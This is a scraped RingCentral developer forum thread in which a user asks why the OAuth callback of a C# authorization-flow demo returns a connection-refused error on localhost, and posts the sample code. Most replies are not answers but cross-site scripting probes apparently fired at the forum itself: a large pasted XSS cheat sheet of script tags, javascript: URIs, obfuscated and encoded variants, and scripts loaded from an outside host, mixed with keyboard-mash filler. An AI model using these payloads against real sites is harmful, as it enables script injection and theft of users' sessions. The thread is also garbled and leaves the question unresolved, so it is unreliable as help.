Getting Started Knowledge Base Community User Manuals Ideas

News & Announcements User Community Developer Community

Welcome to the RingCentral Community

Make sure to review our Terms of Use and Community Guidelines.

Please note the community is currently under maintenance and is read-only.

Home » Developers

Auth Flow ERR_CONNECTION_REFUSED on localhost

Tags: authentication

Apr 8, 2020 at 11:57am • 2 replies • 0 likes

James Walker

Hi. I am trying to run the Authorization Flow demo.

After I enter my username and password, I get a connection refused error. The uri in the browser looks like the following:

http://localhost:5000/oauth2callback?code=U0pDMTFQM

with a long string for code.

Any hints as to where to go next?

2 Answers

arjun singh answered on Apr 9, 2020 at 2:38am

<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>

arjun singh answered on Apr 9, 2020 at 2:36am

ddddddddddddddddddddddddddddddddddd

arjun singh answered on Apr 9, 2020 at 2:31am

'-alert(document.domain)-'&did='-alert(document.domain)-'. [5:21%11PM,%202/29/2020]%joker:%20 javascript:alert("hellox worldss") <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> PT SRC="http://ha.ckers.org/xss.js">; < <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1

arjun singh answered on Apr 9, 2020 at 3:48am

cccccccccccccccccccccccccc

Phong Vu answered on Apr 8, 2020 at 12:30pm

Can you show how you implement your code? Take out sensitive information such as you app client id, secret etc.

arjun singh answered on Apr 9, 2020 at 3:21am

fffffffffffffffffffffffffffffffffffffffffffffff

arjun singh answered on Apr 9, 2020 at 3:06am

sdfsdfsfsdfs

arjun singh answered on Apr 9, 2020 at 2:52am

arjun singh answered on Apr 9, 2020 at 2:32am

hellox worldss

...

lol "> "> "> "> <% foo>

LOL LOL <SCRIPT>alert(/XSS/.source)</SCRIPT> \\";alert('XSS');// </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT> <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"> <BODY BACKGROUND=\"javascript:alert('XSS')\"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC=\"javascript:alert('XSS')\"> <IMG LOWSRC=\"javascript:alert('XSS')\"> <BGSOUND SRC=\"javascript:alert('XSS');\"> <BR SIZE=\"&{alert('XSS')}\"> <LAYER SRC=\" http://ha.ckers.org/scriptlet.html"></LAYER>; <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"> <LINK REL=\"stylesheet\" HREF=\" http://ha.ckers.org/xss.css">; <STYLE>@import' http://ha.ckers.org/xss.css';</STYLE>; <META HTTP-EQUIV=\"Link\" Content=\"< http://ha.ckers.org/xss.css>;; REL=stylesheet\"> <STYLE>BODY{-moz-binding:url(\" http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>; <XSS STYLE=\"behavior: url(xss.htc);\"> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox(\"XSS\")'> <IMG SRC=\"mocha:[code]\"> <IMG SRC=\"livescript:[code]\"> žscriptualert(EXSSE)ž/scriptu <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\" <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME> <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> <TABLE BACKGROUND=\"javascript:alert('XSS')\"> <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\"> <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"> <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\"> <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"> <DIV STYLE=\"width: expression(alert('XSS'));\"> <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE> <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"> <XSS STYLE=\"xss:expression(alert('XSS'))\"> exp/*<A STYLE='no\xss:noxss(\"*//*\"); xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'> <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A> <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>  <BASE HREF=\"javascript:alert('XSS');//\"> <OBJECT TYPE=\"text/x-scriptlet\" DATA=\" http://ha.ckers.org/scriptlet.html"></OBJECT>; <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC=\" http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED> <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED> a=\"get\"; b=\"URL(\\"\"; c=\"javascript:\"; d=\"alert('XSS');\\")\"; eval(a+b+c+d); <HTML xmlns:xss><?import namespace=\"xss\" implementation=\" http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>; <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID=\"xss\"><I><B><IMG SRC=\"javascript:alert('XSS')\"></B></I></XML> <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN> <XML SRC=\"xsstest.xml\" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"> <?import namespace=\"t\" implementation=\"#default#time2\"> <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\"> </BODY></HTML> <SCRIPT SRC=\" http://ha.ckers.org/xss.jpg"></SCRIPT>; ; <? echo('<SCR)'; echo('IPT>alert(\"XSS\")</SCRIPT>'); ?> <IMG SRC=\" http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">; Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\"> <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=\">\" SRC=\" http://ha.ckers.org/xss.js"></SCRIPT>; <SCRIPT =\">\" SRC=\" http://ha.ckers.org/xss.js"></SCRIPT>; <SCRIPT a=\">\" '' SRC=\" http://ha.ckers.org/xss.js"></SCRIPT>; <SCRIPT \"a='>'\" SRC=\" http://ha.ckers.org/xss.js"></SCRIPT>; <SCRIPT a=`>` SRC=\" http://ha.ckers.org/xss.js"></SCRIPT>; <SCRIPT a=\">'>\" SRC=\" http://ha.ckers.org/xss.js"></SCRIPT>; <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\" http://ha.ckers.org/xss.js"></SCRIPT>; <A HREF=\"http://66.102.7.147/\">XSS</A> <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A> <A HREF=\"http://1113982867/\">XSS</A> <A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A> <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A> <A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A> <A HREF=\"// www.google.com/">XSS</A>; <A HREF=\"//google\">XSS</A> <A HREF=\" http://ha.ckers.org@google\">XSS</A> <A HREF=\"http://google: ha.ckers.org\">XSS</A> <A HREF=\" http://google.com/">XSS</A>; <A HREF=\" http://www.google.com./\">XSS</A> <A HREF=\"javascript:document.location=' http://www.google.com/'">XSS</A>; <A HREF=\"http://www.gohttp:// www.google.com/ogle.com/">XSS</A>; < %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C <iframe src= http://ha.ckers.org/scriptlet.html>; <IMG SRC=\"javascript:alert('XSS')\" <SCRIPT SRC=// ha.ckers.org/.js>; <SCRIPT SRC= http://ha.ckers.org/xss.js?<B>; <<SCRIPT>alert(\"XSS\");//<</SCRIPT> <SCRIPT/SRC=\" http://ha.ckers.org/xss.js"></SCRIPT>; <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")> <SCRIPT/XSS SRC=\" http://ha.ckers.org/xss.js"></SCRIPT>; <IMG SRC=\" javascript:alert('XSS');\"> perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"> <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=\"javascript:alert('XSS');\"> <SCRIPT SRC= http://ha.ckers.org/xss.js></SCRIPT>; '';!--\"<XSS>=&{()} ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()}

< \";alert('XSS');// ¼script¾alert(¢XSS¢)¼/script¾

exp/*

a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); PT SRC=" http://ha.ckers.org/xss.js">; TESTHTML5FORMACTION crosssitespt

arjun singh answered on Apr 9, 2020 at 2:28am

"/><script>alert(1)</script>

arjun singh answered on Apr 9, 2020 at 3:56am

xxxxxxxxxxxxxxxx

arjun singh answered on Apr 9, 2020 at 3:14am

">')" />

James Walker answered on Apr 8, 2020 at 1:52pm

I just copied the C# example from the ringcentral site. The only thing I changed was the Client ID and Secret:

using System.Linq;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;
using Microsoft.AspNetCore.Http;
using Microsoft.Extensions.DependencyInjection;
using RingCentral;
using Newtonsoft.Json;
using Microsoft.Extensions.Hosting;

namespace RCAuthFlowV2
{
public class Startup
{
private const string RINGCENTRAL_CLIENT_ID = "XXXXXXXXXX";
private const string RINGCENTRAL_CLIENT_SECRET = "YYYYYYYYYYYYYYYYYYY";
private const string RINGCENTRAL_SERVER_URL = "https://platform.devtest.ringcentral.com";
private const string RINGCENTRAL_REDIRECT_URL = "http://localhost:5000/oauth2callback";
private const string SESSION_TOKEN_KEY = "rc-token";

public void ConfigureServices(IServiceCollection services)
{
services.AddMvc().AddSessionStateTempDataProvider();
services.AddSession();
}

private static string Html(string body)
{
return $@"<!doctype html><html><body>{body}</body></html>";
}

public void Configure(IApplicationBuilder app, IWebHostEnvironment env)
{
if (env.IsDevelopment()) app.UseDeveloperExceptionPage();
app.UseSession();
app.Run(async (context) =>
{
var rc = new RestClient(RINGCENTRAL_CLIENT_ID, RINGCENTRAL_CLIENT_SECRET, RINGCENTRAL_SERVER_URL);
var tokenString = context.Session.GetString(SESSION_TOKEN_KEY);
if (tokenString != null)
{
rc.token = JsonConvert.DeserializeObject<TokenInfo>(tokenString);
}
else if (context.Request.Path != "/oauth2callback")
{
var oauthUri = rc.AuthorizeUri(RINGCENTRAL_REDIRECT_URL);
await context.Response.WriteAsync(
Html($"<h2>RingCentral Authorization Code Flow Authentication</h2><a href=\"{oauthUri}\">Login RingCentral Account</a>"));
return;
}

switch (context.Request.Path)
{
case "/":
await context.Response.WriteAsync(Html(@"<b><a href=""/logout"">Logout</a></b>
<h2>Call APIs</h2>
<ul>
<li><a href=""/test?api=extension"" target=""_blank"">Read Extension Info</a></li>
<li><a href=""/test?api=extension-call-log"" target=""_blank"">Read Extension Call Log</a></li>
<li><a href=""/test?api=account-call-log"" target=""_blank"">Read Account Call Log</a></li>
</ul>"));
break;
case "/oauth2callback":
context.Request.Query.TryGetValue("code", out var codes);
var code = codes.First();
await rc.Authorize(code, RINGCENTRAL_REDIRECT_URL);
context.Session.SetString(SESSION_TOKEN_KEY, JsonConvert.SerializeObject(rc.token));
context.Response.Redirect("/");
break;
case "/test":
context.Request.Query.TryGetValue("api", out var apis);
var api = apis.First();
var result = "";
switch (api)
{
case "extension":
result = await rc.Get<string>("/restapi/v1.0/account/~/extension");
break;
case "extension-call-log":
result = await rc.Get<string>("/restapi/v1.0/account/~/extension/~/call-log");
break;
case "account-call-log":
result = await rc.Get<string>("/restapi/v1.0/account/~/call-log");
break;
}

await context.Response.WriteAsync(Html($"<pre>{result}</pre>"));
break;
case "/logout":
await rc.Revoke();
context.Session.Remove(SESSION_TOKEN_KEY);
context.Response.Redirect("/");
break;
default:
context.Response.StatusCode = 404;
break;
}
});
}
}
}

arjun singh answered on Apr 9, 2020 at 2:26am

A new Community is coming to RingCentral!

Posts are currently read-only as we transition into our new platform.

We thank you for your patience
during this downtime.

Try Workflow Builder

Did you know you can easily automate tasks like responding to SMS, team messages, and more? Plus it's included with RingCentral Video and RingEX plans!

Try RingCentral Workflow Builder

PRODUCTS
RingEX
Message
Video
Phone

OPEN ECOSYSTEM
Developer Platform
APIs
Integrated Apps
App Gallery
Developer support
Games and rewards

RESOURCES
Resource center
Blog
Product Releases
Accessibility

QUICK LINKS
App Download
RingCentral App login
Admin Portal Login
Contact Sales